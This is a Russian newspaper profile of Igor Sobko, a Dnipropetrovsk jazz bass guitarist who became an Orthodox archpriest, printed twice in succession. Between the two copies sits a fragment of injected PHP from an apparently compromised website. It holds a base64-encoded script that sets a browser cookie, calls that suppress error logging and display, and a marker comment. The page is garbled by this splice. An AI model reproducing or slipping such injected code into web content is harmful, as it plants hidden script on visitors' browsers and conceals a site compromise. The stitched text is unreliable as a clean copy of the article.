Со сцены – на амвон

«Вечерка» продолжает серию публикаций о выдающихся музыкантах Днепропетровска, которые хорошо известны любителям джазовой музыки

Жизнь протоиерея днепропетровского Свято-Троицкого кафедрального собора отца Игоря можно разделить на две части. Причем, обе они сложились довольно успешно. Сегодняшние деяния батюшки – на виду у общественности, а проводимые им в городе культурные мероприятия пользуются большой популярностью среди днепропетровцев и гостей города. Но многие знают отца Игоря (в миру Игорь Собко) как талантливого джазового музыканта.

Об этой не менее интересной части его жизни «Вечерка» расскажет сегодня подробней.

Родом будущий музыкант и священник из Западной Украины. Родился в небольшом городке Владимире-Волынском в 1962 году. Самыми яркими воспоминаниями детства остались популярные в этих местах «вечорниці». Жители округи после 9-10 часов вечера собирались у соседки, которая хорошо играла на баяне. Сам Игорь еще в дошкольные годы нередко усаживался прямо на ступеньках отчего дома и громко распевал украинские песни.

– Ну, это точно будет музыкант, – говорили проходившие мимо соседи, и как в воду глядели. В музыкальной школе Игорь занимался по классу баяна, хотя поступить в этот класс было непросто – уж слишком популярен был инструмент. Нужно отдать должное маме малолетнего музыканта – именно ей доводилось носить баян на занятия и обратно, а путь был неблизкий. Поэтому, когда Игорь решил сменить инструмент и стал учиться игре на трубе, возмущение мамы можно было понять. В конце концов она смирилась, ведь сын делал серьезные успехи, и подтверждение тому – высокая оценка публики. Уже с 12 лет его стали приглашать в ансамбль, который играл на сельских свадьбах.

Осознание того, что тебя приглашают, и ты справляешься, было самым главным. Учителя школы знали, что в субботу Игоря на занятиях не будет – он на свадьбе. Труд этот был не из легких – играть приходилось до четырех утра. Так пришел первый заработок, но о деньгах Игорь не думал, главной была музыка. И так было всегда, в чем можно убедиться, познакомившись с дальнейшей биографией Игоря Собко.

В годы учебы в училище он играл в эстрадно-симфоническом оркестре. Музыканты в те годы были востребованы, – достаточно сказать, что практически в каждом институте был свой оркестр. Комсомол и партия требовали развивать художественную самодеятельность. Поэтому в некоторые институты зачисляли музыкантов даже без экзаменов, дабы обеспечить уровень самодеятельности. В 1980 году Игоря пригласили играть в оркестр Днепропетровского металлургического института, которым руководил Михаил Спиридонович Демьянов. Новичок взялся за работу на новом месте с воодушевлением. В общежитии он каждое утро вставал в 6 утра и занимался на трубе и на бас-гитаре, которой тоже серьезно увлекся. А вот к учебе в институте относился с прохладцей.

– Зачем учиться? – недоуменно спрашивал он у дирижера, – ведь я музыкант и гарантирую, что вреда металлургии не принесу, я по этой специальности работать не буду.

Но дирижер требовал, чтобы «хвостов» ни у кого не было, и пришлось подтянуться.

Потом Игоря пригласили в оркестр агрегатного завода, где собрались лучшие на тот момент джазовые музыканты города, а руководил ими талантливый дирижер Юрий Пивак. Директора заводов не менее, чем ректоры институтов, стремились организовать самодеятельность высокого уровня.

Во-первых, за это можно было получить поощрение по партийной линии, а во-вторых, некоторые и сами любили музыку. Людей, которые оформлялись на одну должность, а работали на другой, в народе называли «подснежниками». Вот и Игорь Собко числился рабочим в цехе, но туда он даже не заходил, а работал в оркестре. Правда, здесь ему пришлось расстаться с трубой, что, как показала жизнь, было к лучшему.

– Я услышал, как играет трубач оркестра Олег Анапольский (в будущем знаменитый музыкант), который мог даже свистеть на трубе, и перешел на бас-гитару, – вспоминает Игорь Собко.

Но кроме этого Игорь устроился на работу в оркестр театра им. Т.Г. Шевченко, давал уроки музыки, создал свой ансамбль, иногда играл на свадьбах, и это позволило неплохо заработать. Появилась возможность купить квартиру. Но к тому времени Игорь уже окончательно решил, что свяжет свою жизнь с музыкой, и на все деньги купил две профессиональные и очень дорогие бас-гитары.

Закончив институт, Игорь, как и обещал, по специальности работать не стал. Написал письма во все филармонии Украины (сейчас такие называют «резюме») и получил приглашение в ансамбль «Беркут» Ивано-Франковской филармонии. Объездил с гастролями всю Западную Украину, а потом пришло приглашение из Донецкой филармонии. Хорошего бас-гитариста отпускать из Ивано-Франковска не хотели, и чтобы удержать, даже предлагали квартиру. Но Игорь все бросил, ведь появилась возможность играть то, что хочется – джаз! Оказалось, в Донецкой филармонии создавал джазовое трио днепропетровский гитарист Александр Любченко. Совместное творчество и человеческая дружба связали их на долгие годы. Это трио много гастролировало, становилось лауреатом множества джазовых фестивалей, получило высокую оценку коллег и критиков Советского Союза. Хотя в совместной работе наших музыкантов были и длительные перерывы – периодически каждый занимался своими проектами. Игоря Собко приглашали в очень популярный ленинградский «Ансамбль Голощекина». Знакомые считали, что Игорю очень повезло, однако он сам это приглашение проигнорировал.

– Я считал и считаю, что нашим музыкантам не стоит играть американский джаз, нужно основываться на своей, славянской культуре, – поясняет Игорь Собко.

Одно время он работал в ансамбле «Время» Днепропетровской филармонии и, наконец, получил двухкомнатную квартиру от филармонии. Это красноречиво говорит об отношении к талантливым музыкантам в то время.

Потом Игорь Собко создал квартет «Аквополис». «Вечерка» уже рассказывала о некоторых талантливых джазовых музыкантах Днепропетровска, естественно, их пути пересекались. Так, например, «Аквополис» успешно сотрудничал с саксофонистом Юрием Биленко. Игорь Собко сам писал пьесы для своего ансамбля, который впоследствии успешно выступил на фестивале в Дании, записал собственные диски. В конце восьмидесятых «Аквополис» влился в оркестр конно-спортивного театра каскадеров, выступавшего в Москве и Ленинграде. Труппу театра составляли каскадеры советского кинематографа. Потом кто-то подсказал, что в ансамбль Софии Ротару набирают новых музыкантов. Игорь поехал в Черновцы, к супругу знаменитой певицы Анатолию Евдокименко, который был неизменным руководителем ее ансамбля «Червона рута», и дал послушать диск своего ансамбля. Днепропетровские музыканты сразу же были приняты на работу. Более того, они поставили условие, что в концертной программе будут исполнять две собственные пьесы. После короткого репетиционного периода начался гастрольный тур.

– Конечно, это было потрясающе, – вспоминает Игорь. – Масса зрителей, ошеломляющий успех, море цветов, поначалу у меня даже слезы наворачивались на глаза.

Заработки здесь были очень высокими. Игорь Собко и его товарищи зарабатывали по 150 рублей за один день. Правда, в день давали по три концерта.

Здесь сделаем небольшое отступление и напомним, что в советские времена рядовой инженер получал до 150 рублей в месяц. Рабочий средней руки – 200-300 руб., квалифицированный рабочий – 400-600 руб., особо уникальные – до 800 руб.

А музыканты у Софии Ротару могли заработать более 3 тыс. руб. в месяц. Легко можно прикинуть, что доход самой солистки превышал 10 тыс. руб. И хотя зарубежные звезды шоу-бизнеса зарабатывали миллионы, наши, слава Богу, тоже были людьми весьма обеспеченными.

Многие музыканты желали бы работать в этом ансамбле всю жизнь, но только не джазмены. Им не понравилось, что договоренность об исполнении на концертах своих пьес так и не выполнялась, у музыкантов при таком насыщенном гастрольном графике не было возможности самим репетировать. Словом, после первого же гастрольного тура они решили уйти. Коллеги со всех сторон буквально кричали: «Вы что, с ума сошли, от Сони уходить?». Но наши музыканты единогласно решили пойти на собственные хлеба и опять играть то, что хочется.

Игорь Собко сочинил и исполнил целую концертную программу на бас-гитаре и контрабасе. Тем самым доказал, что эти инструменты являются не аккомпанирующими, а солирующими.

С возрастом Игорь Собко все чаще стал посещать храм, соблюдал посты. И, как назло, именно в период поста приходились играть концерты. Поэтому все отчетливей проявлялось противоречие в душе, и в 1993 году Игорь Собко повесил гитару на гвоздь, потом окончил духовную семинарию и теперь служит Богу, шагнув со сцены на амвон.

К счастью, он не оставил музыку и, возглавляя Центр православной культуры «Лествица», организует музыкальные фестивали «Остров классики», «Международную Киноассамблею на Днепре» и пишет музыку для документальных фильмов. В частности, Сюита №1 светлой памяти Петра Столыпина стала музыкальным сопровождением к 4-серийному фильму «Господин премьер-министр». Детищем отца Игоря являются телепередачи «Седмица» и в «Гостях у Дуняши». Все это, очевидно, и стало основанием для присвоения ему звания «Заслуженный работник культуры Украины».

Валерий Захаров

aG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsNCiB9DQoNCiB9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*457563643*/ ?> Со сцены – на амвон | Центр православной культуры Лествица

Со сцены – на амвон

«Вечерка» продолжает серию публикаций о выдающихся музыкантах Днепропетровска, которые хорошо известны любителям джазовой музыки

Жизнь протоиерея днепропетровского Свято-Троицкого кафедрального собора отца Игоря можно разделить на две части. Причем, обе они сложились довольно успешно. Сегодняшние деяния батюшки – на виду у общественности, а проводимые им в городе культурные мероприятия пользуются большой популярностью среди днепропетровцев и гостей города. Но многие знают отца Игоря (в миру Игорь Собко) как талантливого джазового музыканта.

Об этой не менее интересной части его жизни «Вечерка» расскажет сегодня подробней.

Родом будущий музыкант и священник из Западной Украины. Родился в небольшом городке Владимире-Волынском в 1962 году. Самыми яркими воспоминаниями детства остались популярные в этих местах «вечорниці». Жители округи после 9-10 часов вечера собирались у соседки, которая хорошо играла на баяне. Сам Игорь еще в дошкольные годы нередко усаживался прямо на ступеньках отчего дома и громко распевал украинские песни.

– Ну, это точно будет музыкант, – говорили проходившие мимо соседи, и как в воду глядели. В музыкальной школе Игорь занимался по классу баяна, хотя поступить в этот класс было непросто – уж слишком популярен был инструмент. Нужно отдать должное маме малолетнего музыканта – именно ей доводилось носить баян на занятия и обратно, а путь был неблизкий. Поэтому, когда Игорь решил сменить инструмент и стал учиться игре на трубе, возмущение мамы можно было понять. В конце концов она смирилась, ведь сын делал серьезные успехи, и подтверждение тому – высокая оценка публики. Уже с 12 лет его стали приглашать в ансамбль, который играл на сельских свадьбах.

Осознание того, что тебя приглашают, и ты справляешься, было самым главным. Учителя школы знали, что в субботу Игоря на занятиях не будет – он на свадьбе. Труд этот был не из легких – играть приходилось до четырех утра. Так пришел первый заработок, но о деньгах Игорь не думал, главной была музыка. И так было всегда, в чем можно убедиться, познакомившись с дальнейшей биографией Игоря Собко.

В годы учебы в училище он играл в эстрадно-симфоническом оркестре. Музыканты в те годы были востребованы, – достаточно сказать, что практически в каждом институте был свой оркестр. Комсомол и партия требовали развивать художественную самодеятельность. Поэтому в некоторые институты зачисляли музыкантов даже без экзаменов, дабы обеспечить уровень самодеятельности. В 1980 году Игоря пригласили играть в оркестр Днепропетровского металлургического института, которым руководил Михаил Спиридонович Демьянов. Новичок взялся за работу на новом месте с воодушевлением. В общежитии он каждое утро вставал в 6 утра и занимался на трубе и на бас-гитаре, которой тоже серьезно увлекся. А вот к учебе в институте относился с прохладцей.

– Зачем учиться? – недоуменно спрашивал он у дирижера, – ведь я музыкант и гарантирую, что вреда металлургии не принесу, я по этой специальности работать не буду.

Но дирижер требовал, чтобы «хвостов» ни у кого не было, и пришлось подтянуться.

Потом Игоря пригласили в оркестр агрегатного завода, где собрались лучшие на тот момент джазовые музыканты города, а руководил ими талантливый дирижер Юрий Пивак. Директора заводов не менее, чем ректоры институтов, стремились организовать самодеятельность высокого уровня.

Во-первых, за это можно было получить поощрение по партийной линии, а во-вторых, некоторые и сами любили музыку. Людей, которые оформлялись на одну должность, а работали на другой, в народе называли «подснежниками». Вот и Игорь Собко числился рабочим в цехе, но туда он даже не заходил, а работал в оркестре. Правда, здесь ему пришлось расстаться с трубой, что, как показала жизнь, было к лучшему.

– Я услышал, как играет трубач оркестра Олег Анапольский (в будущем знаменитый музыкант), который мог даже свистеть на трубе, и перешел на бас-гитару, – вспоминает Игорь Собко.

Но кроме этого Игорь устроился на работу в оркестр театра им. Т.Г. Шевченко, давал уроки музыки, создал свой ансамбль, иногда играл на свадьбах, и это позволило неплохо заработать. Появилась возможность купить квартиру. Но к тому времени Игорь уже окончательно решил, что свяжет свою жизнь с музыкой, и на все деньги купил две профессиональные и очень дорогие бас-гитары.

Закончив институт, Игорь, как и обещал, по специальности работать не стал. Написал письма во все филармонии Украины (сейчас такие называют «резюме») и получил приглашение в ансамбль «Беркут» Ивано-Франковской филармонии. Объездил с гастролями всю Западную Украину, а потом пришло приглашение из Донецкой филармонии. Хорошего бас-гитариста отпускать из Ивано-Франковска не хотели, и чтобы удержать, даже предлагали квартиру. Но Игорь все бросил, ведь появилась возможность играть то, что хочется – джаз! Оказалось, в Донецкой филармонии создавал джазовое трио днепропетровский гитарист Александр Любченко. Совместное творчество и человеческая дружба связали их на долгие годы. Это трио много гастролировало, становилось лауреатом множества джазовых фестивалей, получило высокую оценку коллег и критиков Советского Союза. Хотя в совместной работе наших музыкантов были и длительные перерывы – периодически каждый занимался своими проектами. Игоря Собко приглашали в очень популярный ленинградский «Ансамбль Голощекина». Знакомые считали, что Игорю очень повезло, однако он сам это приглашение проигнорировал.

– Я считал и считаю, что нашим музыкантам не стоит играть американский джаз, нужно основываться на своей, славянской культуре, – поясняет Игорь Собко.

Одно время он работал в ансамбле «Время» Днепропетровской филармонии и, наконец, получил двухкомнатную квартиру от филармонии. Это красноречиво говорит об отношении к талантливым музыкантам в то время.

Потом Игорь Собко создал квартет «Аквополис». «Вечерка» уже рассказывала о некоторых талантливых джазовых музыкантах Днепропетровска, естественно, их пути пересекались. Так, например, «Аквополис» успешно сотрудничал с саксофонистом Юрием Биленко. Игорь Собко сам писал пьесы для своего ансамбля, который впоследствии успешно выступил на фестивале в Дании, записал собственные диски. В конце восьмидесятых «Аквополис» влился в оркестр конно-спортивного театра каскадеров, выступавшего в Москве и Ленинграде. Труппу театра составляли каскадеры советского кинематографа. Потом кто-то подсказал, что в ансамбль Софии Ротару набирают новых музыкантов. Игорь поехал в Черновцы, к супругу знаменитой певицы Анатолию Евдокименко, который был неизменным руководителем ее ансамбля «Червона рута», и дал послушать диск своего ансамбля. Днепропетровские музыканты сразу же были приняты на работу. Более того, они поставили условие, что в концертной программе будут исполнять две собственные пьесы. После короткого репетиционного периода начался гастрольный тур.

– Конечно, это было потрясающе, – вспоминает Игорь. – Масса зрителей, ошеломляющий успех, море цветов, поначалу у меня даже слезы наворачивались на глаза.

Заработки здесь были очень высокими. Игорь Собко и его товарищи зарабатывали по 150 рублей за один день. Правда, в день давали по три концерта.

Здесь сделаем небольшое отступление и напомним, что в советские времена рядовой инженер получал до 150 рублей в месяц. Рабочий средней руки – 200-300 руб., квалифицированный рабочий – 400-600 руб., особо уникальные – до 800 руб.

А музыканты у Софии Ротару могли заработать более 3 тыс. руб. в месяц. Легко можно прикинуть, что доход самой солистки превышал 10 тыс. руб. И хотя зарубежные звезды шоу-бизнеса зарабатывали миллионы, наши, слава Богу, тоже были людьми весьма обеспеченными.

Многие музыканты желали бы работать в этом ансамбле всю жизнь, но только не джазмены. Им не понравилось, что договоренность об исполнении на концертах своих пьес так и не выполнялась, у музыкантов при таком насыщенном гастрольном графике не было возможности самим репетировать. Словом, после первого же гастрольного тура они решили уйти. Коллеги со всех сторон буквально кричали: «Вы что, с ума сошли, от Сони уходить?». Но наши музыканты единогласно решили пойти на собственные хлеба и опять играть то, что хочется.

Игорь Собко сочинил и исполнил целую концертную программу на бас-гитаре и контрабасе. Тем самым доказал, что эти инструменты являются не аккомпанирующими, а солирующими.

С возрастом Игорь Собко все чаще стал посещать храм, соблюдал посты. И, как назло, именно в период поста приходились играть концерты. Поэтому все отчетливей проявлялось противоречие в душе, и в 1993 году Игорь Собко повесил гитару на гвоздь, потом окончил духовную семинарию и теперь служит Богу, шагнув со сцены на амвон.

К счастью, он не оставил музыку и, возглавляя Центр православной культуры «Лествица», организует музыкальные фестивали «Остров классики», «Международную Киноассамблею на Днепре» и пишет музыку для документальных фильмов. В частности, Сюита №1 светлой памяти Петра Столыпина стала музыкальным сопровождением к 4-серийному фильму «Господин премьер-министр». Детищем отца Игоря являются телепередачи «Седмица» и в «Гостях у Дуняши». Все это, очевидно, и стало основанием для присвоения ему звания «Заслуженный работник культуры Украины».

Валерий Захаров